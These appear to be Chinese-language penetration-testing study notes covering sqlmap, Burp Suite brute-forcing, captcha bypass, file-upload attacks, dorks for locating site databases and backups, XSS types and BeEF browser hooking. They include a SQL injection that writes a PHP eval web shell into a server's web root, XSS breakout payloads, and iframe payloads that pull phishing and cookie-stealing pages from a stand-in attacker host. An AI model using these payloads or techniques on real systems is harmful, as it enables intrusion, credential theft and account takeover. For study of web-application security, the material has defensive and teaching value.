sqlmap续

注入语句(知道绝对路径时候可用)

http://192.168.99.171/test2/sqli/example10.php?catid=3’union select 1,’<? @eval($_POST[xy])?>’,3,4 into outfile ‘C:/xampp/htdocs/test2/xinyu2.php‘--+

检测注入:http://192.168.99.171/test/xinyu2.php若有返回内容则已经写入

form表单

--random-agent 随机请求

--cookie=COOKIE 身份赋予

--technique=TECH    SQL injection techniques to use (default "BEUSTQ")T时间E错误C

--dns-domain=DNS..  Domain name used for DNS exfiltration attack

--DNS域=DNS..用于DNS渗出攻击的域名

burp与wireshark的区别

http协议抓包工具burp,能改能发,实时互动

wireshark不能改只能抓住

burp:

target(目标) proxy(代理) spider scanner intruder repeater sequencer decoder compare extend options

详情:

https://blog.csdn.net/lynnlinlin/article/details77488947/

http://blog.csdn.net/lynnlinlin/article/details/76736972

http://blog.csdn.net/lynnlinlin/article/details/77480726

1) Proxy(代理)

代理功能使我们能够截获并修改请求.为了拦截请求,并对其进行操作,修改代理配置. 在这里我们可以编辑代理正在监听的端口.如果我们不选中"listen on loopback interface only"选项,意味着Burp Proxy可以作为一个网络上其它系统的代理。这意味着在同一网络中的任何计算机都可以使用Burp Proxy功能成为代理,并中继通过它的流量. "support invisible proxying for non-proxy-aware client"选项是用于客户端不知道他们使用的是代理的情况下.这意味着代理设置不是设置在浏览器,有时候设置在hosts文件中.在这种情况下,和将代理选项设置在浏览器本身所不同的是Burp需要知道它是从一个非代理客户端接收流量的."redirect to host"和"redirect to port"选项将客户端重定向到我们在该选项后设置的主机和端口。 这里有个选项用来修改从响应中接收到的html网页。我们可以取消隐藏的表单字段,删除javascript等。还有一个选项用自定义字符串替换掉寻找到的特定的模式.我们需要用指定正则表达式。Burp将解析请求或者响应以期望能够寻找到这种模式,将会用自定义的字符串来替换它.一旦Burp Spider提交一个登陆表单的时候就开始爬行(抓取).它可以自动提交我们提供给它的证书.我们同样可以设置admin/password凭证,设置好之后,他们会做为DVWA中的凭证.因此Burp Spider可以自动提交那些信息凭证,并且保持爬行抓取的状态希望能够获得更多的新的信息.你也可以在thread(线程)项来修改线程数. 这样就会启动Burp Spider,在Spider control标签下我们会看到正在做出的请求,我们也可以为Burp Spider自定义一个范围.

2)Intruder(入侵)

Burp Intruder可以用于利用漏洞,模糊测试,暴力猜解等。在这种情况下我们将使用Burp Suite的Intruder对DVWA进行暴力猜解攻击.浏览到DVWA,单击"Burp Force(暴力猜解)",随便输入username和password,确保Burp Suite上的"intercept is on(监听是打开的)".然后点击登陆 以上的操作会将请求信息发送给intruder功能.进入intruder标签,配置Burp Suite来发起暴力猜解的攻击.在target标签下可以看到已经设置好了要请求攻击的目标 单击右边的"clear"按钮,将会删除所有用不同颜色演示的重要的信息.接下来我们需要配置Burp在这次攻击中只把用户名和密码做为参数.选中本次请求中的username(本例中用户名是指"infosecinstiture")然后单击"Add(添加)".同样的将本次请求中的password也添加进去.这样操作之后,用户名和密码将会成为第一个和第二个参数.一旦你操作完成,输出的样子应该如下图所示: 接下来我们需要设置这次攻击的攻击类型,默认情况下的攻击类型是"Sniper(狙击手)",在本例中,我们将使用"Cluster Bomb(集束炸弹)"的攻击类型.有四种攻击类型,分别是singer,battering ram,pitchfork,cluster bomb.下图中我们看到的我们的攻击类型是"Cluster Bomb' 进入payload标签,确保"payload set"的值是1,点击"load(加载)"加载一个包含用户名的文件 。本例中我们使用一个很小的文件来进行演示.加载之后用户名文件中的用户名会如下图所示 同样设置"payload set"的值为2,点击"load"加载一个密码字典文件。 进入"options"标签,确保results下的"store requests"和"store responses"已经选择.

3)Repeater(中继转发) 通过Burp Repeater功能,我们可以手动修改一个请求,并且发送出去,来分析返回的响应.我们需要从不同的地方发送请求给Burp Repeater,比如入侵者,代理等.发送一个请求给Repeater,只需要单击右键"send to Repeater". 点开Repeater标签,会看到request,也可以看到名为1,2,3的3个标签. 我们也可以看到requestparams,header,hex和raw格式的请求,发送请求之前,我们可以修改其中的任何一个. 只修改Params请求下的username=admin,password=password,点击go,这样就会发送这个请求. 我们可以分析response部分返回的响应.

fuzz(模糊测试)

文件上传

第一个被检测而第二个不被检测

双文件上传

inurl:/ewebeditor.mdbà查找数据库

1.管理员后台

2.整站的rar压缩包(***.rar||***.zip)à代码审计

3.编辑器页面 和编辑器管理员后台à弱口令à文件上传

4.留言板à留言板后台à弱口令à文件上传

5.整站,编辑器,留言板的mdb数据库文件à下载数据库获得用户名密码

6.bak后缀文件(网站源码的备份文件)à拿到网站源码

7.其他攻击者留下的木马à破解密码登录

8.网站安装时留下的说明文件à敏感目录和初始用户名密码

GET POST

GET--》HEAD

index.php登录进去的界面

login.php登录界面

admin/verifycode.php验证代码(丢弃它)

绕过验证码(cookie)(burp)【刷新无效】à爆破登录

  1. 原理:验证码往往是单独的一个请求,如果不让它跳转就一直有效(丢弃验证的)
  2. 过程:
    1. 启动burp和一个打开的登录界面
    2. 在repeater里放弃一个验证的请求
    3. 到了提示密码错误或者用户名错误而不是验证码错误的时候,你就成功了
    4. 然后开始进行用户名密码爆破(用户名可以写一些注入语句)
    5. 比对长度查看与众不同的就是
    6. 注意:速度别太快…数据库会哭死的

脑痛的同源策略(约定判断四要素,cookie)

1.host(域名或ip地址,如果是ip地址则看做一个根域名)

2.子域名

3.端口

4.协议

流动ip

花生壳(动态dns解析)内网穿刺(带你的木马找到回家的路)

以及,FQ…

神奇的xss(精通JavaScript):

1.xss的原理:
脚本会在用户的浏览器上执行,从而达到攻击者的各种目的。

客户端嵌入恶意脚本代码

2.xss类型:

(1)反射型

(2)存储型

(3)本地型(dom型)

1.反射型:(php网页)

(1)恶意的客户端代码(html/javascript),是在服务器端合成的

(2)客户输入什么,不做检测,直接原样在客户端显示和执行

2.本地型(dom型):

DOM:document对象,是在JavaScript当中的一种元素

(1)恶意的客户端代码(html/javascript),是在浏览器端合成的

(2)客户输入什么,不做检测,直接原样在客户端显示和执行

3.存储型:

(1)恶意的客户端代码(html/javascript),存入数据库,或其他持久化形式

(2)客户输入什么,不做检测,直接原样在客户端显示和执行

(3)恶意代码在服务器端合成

beef神器

防beef静止浏览器多次请求,进行360防御-.-

使用详情http://netsecurity.51cto.com/art/201307/402179.htm

BeEF是浏览器攻击框架的简称,是一款专注于浏览器端的渗透测试工具。

beef beef

假设此时目标192.168.11.1的服务器访问了这个demo页面

http://192.168.11.152:3000/demos/basic.html。则就被hook上了,

实施攻击 HOOK持续的时间为关闭测试页面为止。在此期间,相当于被控制了,可以发送攻击命令了。选择commands栏,可以看到很多已经分好类的攻击模块。 其中,4种颜色分别表示: 该攻击模块可用,且隐蔽性强 该攻击模块可用,但隐蔽性差 该用户模块是否可用还有待验证 该攻击模块不可用

username=[X]

xss:

闭合:

"><script>alert(1)</script>

"/></textarea><script>alert(1)</script>

注意观察网页源码来使其闭合

xss盗取cookie

cookie即为身份,交流的牌牌,有一个其他人的身份你就成了其他人,然后一不小心就浏览到了后台页面

xss注入点:任意的输入位置,有输入,就有xss。

xss语句

<iframe src="http://www.hacker.com/xss/dy.html" height="400" width="100%" scrolling="no" frameborder="0"></iframe>

<iframe src="http://www.hacker.com//xss/login.html" height="100%" width="100%" scrolling="no" frameborder="0" style="position:absolute;top:0;margin:0;padding:0;left:0;

z-index:99999999;"></iframe>

短网址生成

05-11 19:54